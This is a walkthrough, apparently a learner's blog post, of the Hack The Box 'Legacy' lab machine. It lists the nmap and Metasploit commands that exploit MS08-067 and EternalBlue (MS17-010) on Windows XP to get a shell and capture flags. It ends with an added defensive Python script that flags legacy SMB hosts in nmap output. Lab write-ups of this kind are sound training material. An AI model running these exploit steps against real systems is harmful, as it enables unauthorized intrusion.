I know this is an oldie, but I’m learning here and I wanted to know more about Metasploit. I have found 2 exploits for this Legacy machine on Hack The Box and am going to explain both of them. I’m using Metasploit to exploit this machine.
Using Exploit 1 on Legacy
Start an nmap scan
nmap -T4 -A -p- 10.10.10.4
We see that port 445 is open and that this is a Windows XP machine. With a bit of googling you will come across MS08-067.
This is from Rapid7, so it is probably in Metasploit.
Start up Metasploit by typing
msfconsole
search MS08-067
Type use 0
options
Fill in all the requirements (RHOST and LHOST)
set RHOST 10.10.10.4
set LHOST <YOUR MACHINE IP>
If everything is filled in, type
run
Now you can navigate to the user's desktop and the administrator's desktop to get the flags for user and root. Remember this is a Windows machine, so use type flag.txt to output the content of a file to the screen.
Using Exploit 2
It is a legacy system and therefore probably vulnerable to EternalBlue (MS17-010).
Open the msfconsole by typing msfconsole in the terminal
Type in
search MS17-010
For most of them we need the host to be x64 except the psexec one. Type in
use 4
options
set RHOST 10.10.10.4
set LHOST <YOUR MACHINE IP>
As you see, I needed to run it a couple of times to get the shell. If you do not get a shell, then reset the box. It should pop up in a couple of tries.
This concludes Hack The Box Legacy with Metasploit. Now we all know how important it is to update your operating systems. This more or less confirms it.
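For the defensive side of that conclusion, here is an added example (not part of the original walkthrough) that parses nmap XML output, as saved with -oX, and lists hosts that expose 445/tcp together with an end-of-life Windows OS guess, the same two observations made from the scan above. The sample XML, the addresses, the LEGACY_MARKERS list and the function name are constructed for illustration.

```python
import xml.etree.ElementTree as ET

# Constructed sample in nmap's -oX layout (addresses from the documentation range).
SAMPLE_XML = """<nmaprun>
  <host><address addr="192.0.2.10" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="445"><state state="open"/></port></ports>
    <os><osmatch name="Microsoft Windows XP SP3" accuracy="96"/></os></host>
  <host><address addr="192.0.2.20" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="445"><state state="filtered"/></port></ports>
    <os><osmatch name="Microsoft Windows XP SP2" accuracy="90"/></os></host>
  <host><address addr="192.0.2.30" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="445"><state state="open"/></port></ports>
    <os><osmatch name="Microsoft Windows Server 2019" accuracy="94"/></os></host>
</nmaprun>"""

# Assumption: OS name fragments treated as end-of-life; extend for your own estate.
LEGACY_MARKERS = ("windows xp", "windows 2000", "server 2003")

def legacy_smb_hosts(xml_text, min_accuracy=85):
    """Return [(ip, os_name)] for hosts with 445/tcp open and a legacy OS guess."""
    findings = []
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        # Only count SMB when nmap reported the port as open, not filtered/closed.
        smb_open = any(
            p.get("protocol") == "tcp" and p.get("portid") == "445"
            and p.find("state[@state='open']") is not None
            for p in host.iter("port")
        )
        if addr is None or not smb_open:
            continue
        # Take the first OS guess that is confident enough and looks end-of-life.
        for match in host.iter("osmatch"):
            name = match.get("name", "")
            if (int(match.get("accuracy", "0")) >= min_accuracy
                    and any(m in name.lower() for m in LEGACY_MARKERS)):
                findings.append((addr.get("addr"), name))
                break
    return findings

if __name__ == "__main__":
    for ip, os_name in legacy_smb_hosts(SAMPLE_XML):
        print(f"{ip}: {os_name} exposes SMB on 445/tcp, patch or isolate")
```

Run it against scans of networks you administer. OS detection is a guess, so confirm each finding on the host before acting on it.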